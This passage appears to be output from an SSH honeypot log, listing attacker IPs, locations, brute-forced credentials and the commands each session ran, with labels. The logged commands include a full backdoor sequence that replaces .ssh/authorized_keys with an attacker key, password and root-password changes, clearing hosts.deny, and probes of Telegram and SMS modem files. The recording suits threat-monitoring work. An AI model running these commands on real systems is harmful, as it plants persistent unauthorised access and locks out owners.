"CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ร—16
$ uname -m 2 > /dev/null ร—16
$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ร—16
๐ŸŽญ derelict_phantom_root (186.10.86.130) โ€” Las Condes, Chile ยท 1 session ยท 2 cmds
2026-06-30 14:25 EDT ยท as oracle/welcome1
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ brisk_lantern_root (124.228.34.69) โ€” Hengyang, China ยท 1 session ยท 2 cmds
2026-06-30 14:00 EDT ยท as oracle/oracle@123456
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ cryptic_dutch_root (45.153.34.161) โ€” Eygelshoven, The Netherlands ยท 31 sessions ยท 31 cmds
2026-06-30 13:03 EDT ยท as admin/123456, admin/admin, admin/admin123
Ran uname 6x across 6 sessions โ€” automated OS fingerprinting.
$ uname -s -v -n -r -m ร—31
๐ŸŽญ rabid_silk_root_130 (14.29.198.130) โ€” Shenzhen, China ยท 2 sessions ยท 39 cmds
2026-05-17 10:36 EDT ยท as oracle/123qweasd, root/pass123
file attribute tampering โ†’ SSH key persistence โ†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh ร—2
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ ร—2
โ†ณ SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l ร—2
โ†ณ CPU profiling
$ echo -e "123qweasd\n0Xk2mdp6CtFE\n0Xk2mdp6CtFE"|passwd|bash
$ Enter new UNIX password:
$ echo "123qweasd\n0Xk2mdp6CtFE\n0Xk2mdp6CtFE\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' ร—2
โ†ณ CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' ร—2
$ ls -lh $(which ls) ร—2
$ which ls ร—2
$ crontab -l ร—2
โ†ณ persistence setup
$ w ร—2
โ†ณ logged-in users check
$ uname -m ร—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l ร—2
โ†ณ CPU profiling
$ top ร—2
โ†ณ process monitoring
$ uname ร—2
โ†ณ OS identification
$ uname -a ร—2
โ†ณ OS/kernel identification
$ whoami ร—2
โ†ณ privilege check
$ lscpu | grep Model ร—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' ร—2
$ echo "root:2PZCwT26SKwP"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;
โ†ณ execute from /tmp
๐ŸŽญ velvet_silk_root (117.83.248.193) โ€” Nanjing, China ยท 1 session ยท 9 cmds
2026-06-30 10:35 EDT ยท as root/root
/root/root login via velvetsilkroot โ†’ OS fingerprinting (uname -a, /ip cloud print) โ†’ hardware enumeration (ifconfig, cat /proc/cpuinfo) โ†’ cryptominer reconnaissance (ps | grep '[Mm]iner', ps -ef | grep '[Mm]iner') โ†’ Telegram desktop data probing (ls -la ~/.local/share/TelegramDesktop/tdata) โ†’
$ /ip cloud print
$ ifconfig
โ†ณ network mapping
$ uname -a
โ†ณ OS/kernel identification
$ cat /proc/cpuinfo
โ†ณ CPU profiling
$ ps | grep '[Mm]iner'
$ ps -ef | grep '[Mm]iner'
$ ls -la ~/.local/share/TelegramDesktop/tdata /home/*/.local/share/TelegramDesktop/tdata /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/*
$ locate D877F783D5D3EF8Cs
$ echo Hi | cat -n
๐ŸŽญ jittery_eagle_root_53 (20.102.98.53) โ€” Boydton, United States ยท 1 session ยท 20 cmds
2026-06-30 08:56 EDT ยท as admin/password
cd ~; chattr -ia .ssh; lockr -ia .ssh โ†’ cd ~ && rm -rf .ssh && mkdir .ssh โ†’ echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7Vv" โ†’ echo -e "password\nUz46
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l
โ†ณ CPU profiling
$ echo -e "password\nUz46ABCTULpj\nUz46ABCTULpj"|passwd|bash
$ Enter new UNIX password:
$ echo "password\nUz46ABCTULpj\nUz46ABCTULpj\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
โ†ณ CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l
โ†ณ persistence setup
$ w
โ†ณ logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l
โ†ณ CPU profiling
$ top
โ†ณ process monitoring
$ uname
โ†ณ OS identification
$ uname -a
โ†ณ OS/kernel identification
$ whoami
โ†ณ privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
๐ŸŽญ cryptic_orchid_root_46 (101.47.14.46) โ€” Singapore, Singapore ยท 1 session ยท 20 cmds
2026-06-30 08:52 EDT ยท as admin/password
cd ~; chattr -ia .ssh; lockr -ia .ssh โ†’ cd ~ && rm -rf .ssh && mkdir .ssh โ†’ echo "ssh-rsa..." โ†’ cat /proc/cpuinfo | grep name | wc -l โ†’ echo "password\nTAlCqKHpGC8H\nTAlCqKHpGC8H"|passwd|bash โ†’ cat /
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l
โ†ณ CPU profiling
$ echo -e "password\nTAlCqKHpGC8H\nTAlCqKHpGC8H"|passwd|bash
$ Enter new UNIX password:
$ echo "password\nTAlCqKHpGC8H\nTAlCqKHpGC8H\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
โ†ณ CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l
โ†ณ persistence setup
$ w
โ†ณ logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l
โ†ณ CPU profiling
$ top
โ†ณ process monitoring
$ uname
โ†ณ OS identification
$ uname -a
โ†ณ OS/kernel identification
$ whoami
โ†ณ privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
๐ŸŽญ arctic_eagle_sol (141.11.88.22) โ€” Crugers, United States ยท 27 sessions ยท 27 cmds
2026-06-30 06:53 EDT ยท as admin/123456, admin/admin, admin/admin123
Ran uname 2x across 2 sessions โ€” automated OS fingerprinting.
$ uname -s -v -n -r -m ร—27
๐ŸŽญ placid_windmill_root (45.156.87.34) โ€” Eygelshoven, The Netherlands ยท 46 sessions ยท 46 cmds
2026-06-15 06:57 EDT ยท as admin/123456, admin/admin, admin/admin123
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -s -v -n -r -m ร—46
๐ŸŽญ zealous_star_root (155.103.69.40) โ€” New York, United States ยท 62 sessions ยท 62 cmds
2026-06-24 18:07 EDT ยท as admin/123456, admin/admin, admin/admin123
Ran uname 3x across 3 sessions โ€” automated OS fingerprinting.
$ uname -s -v -n -r -m ร—62
๐ŸŽญ murky_gouda_root (45.156.87.253) โ€” Eygelshoven, Netherlands ยท 62 sessions ยท 62 cmds
2026-06-13 21:05 EDT ยท as admin/123456, admin/admin, admin/admin123
Ran uname 35x across 35 sessions โ€” automated OS fingerprinting.
$ uname -s -v -n -r -m ร—62
๐ŸŽญ spectral_samba_root (177.54.62.68) โ€” Criciรบma, Brazil ยท 1 session ยท 2 cmds
2026-06-30 02:46 EDT ยท as oracle/Pass1234
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ velvet_peak_root (43.155.72.127) โ€” Hong Kong, Hong Kong ยท 1 session ยท 2 cmds
2026-06-30 02:34 EDT ยท as oracle/Pass1234
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ aloof_markhor_root (203.135.42.52) โ€” Karachi, Pakistan ยท 1 session ยท 2 cmds
2026-06-30 02:25 EDT ยท as oracle/Pass1234
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ rusty_husk_root (68.211.177.55) โ€” Santiago, Chile ยท 1 session ยท 2 cmds
2026-06-30 02:24 EDT ยท as oracle/Pass1234
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ drowsy_liberty_root_184 (104.248.218.184) โ€” Santa Clara, United States ยท 1 session ยท 2 cmds
2026-06-30 02:23 EDT ยท as oracle/Pass1234
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ aloof_burger_db (172.172.196.177) โ€” Boydton, United States ยท 1 session ยท 2 cmds
2026-06-30 02:11 EDT ยท as oracle/Pass1234
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ clandestine_yankee_root (107.175.69.109) โ€” Buffalo, United States ยท 1 session ยท 2 cmds
2026-06-30 02:05 EDT ยท as oracle/11111111
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ baroque_lotus_db (168.144.123.64) โ€” Bengaluru, India ยท 1 session ยท 2 cmds
2026-06-30 02:03 EDT ยท as oracle/Pass1234
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ haywire_tulip_root (160.119.71.11) โ€” Amsterdam, The Netherlands ยท 110 sessions ยท 110 cmds
2026-06-27 10:56 EDT ยท as admin/password, deploy/deploy, deploy/deploy123
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -s -v -n -r -m ร—110
๐ŸŽญ brazen_kebab_root (94.154.43.66) โ€” Bursa, Turkey ยท 21 sessions ยท 21 cmds
2026-06-29 21:36 EDT ยท as admin/123456, admin/admin, admin/admin123
Ran uname 21x across 21 sessions โ€” automated OS fingerprinting.
$ uname -a ; echo 'vT' ร—21
๐ŸŽญ obsidian_chateau_root (51.75.141.245) โ€” Roubaix, France ยท 1 session ยท 20 cmds
2026-06-29 19:59 EDT ยท as admin/asdf1234
file attribute tampering โ†’ SSH key persistence โ†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l
โ†ณ CPU profiling
$ echo -e "asdf1234\nV6uWKTyVpJbv\nV6uWKTyVpJbv"|passwd|bash
$ Enter new UNIX password:
$ echo "asdf1234\nV6uWKTyVpJbv\nV6uWKTyVpJbv\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
โ†ณ CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l
โ†ณ persistence setup
$ w
โ†ณ logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l
โ†ณ CPU profiling
$ top
โ†ณ process monitoring
$ uname
โ†ณ OS identification
$ uname -a
โ†ณ OS/kernel identification
$ whoami
โ†ณ privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
๐ŸŽญ obsidian_blitz_root (165.227.170.113) โ€” Frankfurt am Main, Germany ยท 1 session ยท 20 cmds
2026-06-29 19:58 EDT ยท as admin/asdf1234
file attribute tampering โ†’ SSH key persistence โ†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l
โ†ณ CPU profiling
$ echo -e "asdf1234\neKSpy8UN3ttE\neKSpy8UN3ttE"|passwd|bash
$ Enter new UNIX password:
$ echo "asdf1234\neKSpy8UN3ttE\neKSpy8UN3ttE\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
โ†ณ CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l
โ†ณ persistence setup
$ w
โ†ณ logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l
โ†ณ CPU profiling
$ top
โ†ณ process monitoring
$ uname
โ†ณ OS identification
$ uname -a
โ†ณ OS/kernel identification
$ whoami
โ†ณ privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
๐ŸŽญ nocturnal_cipher_root (34.78.29.97) โ€” Brussels, Belgium ยท 1 session ยท 20 cmds
2026-06-29 19:46 EDT ยท as admin/asdf1234
file attribute tampering โ†’ SSH key persistence โ†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l
โ†ณ CPU profiling
$ echo -e "asdf1234\nu9Ty23k6Gwkn\nu9Ty23k6Gwkn"|passwd|bash
$ Enter new UNIX password:
$ echo "asdf1234\nu9Ty23k6Gwkn\nu9Ty23k6Gwkn\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
โ†ณ CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l
โ†ณ persistence setup
$ w
โ†ณ logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l
โ†ณ CPU profiling
$ top
โ†ณ process monitoring
$ uname
โ†ณ OS identification
$ uname -a
โ†ณ OS/kernel identification
$ whoami
โ†ณ privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
๐ŸŽญ hollow_blitz_root (167.233.84.171) โ€” Nuremberg, Germany ยท 1 session ยท 1 cmd
2026-06-29 18:09 EDT ยท as root/1234
privilege check
$ whoami
โ†ณ privilege check
๐ŸŽญ ironclad_k-pop_root (222.108.100.117) โ€” Gangseo-gu, South Korea ยท 1 session ยท 2 cmds
2026-06-29 15:34 EDT ยท as oracle/123456a@
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
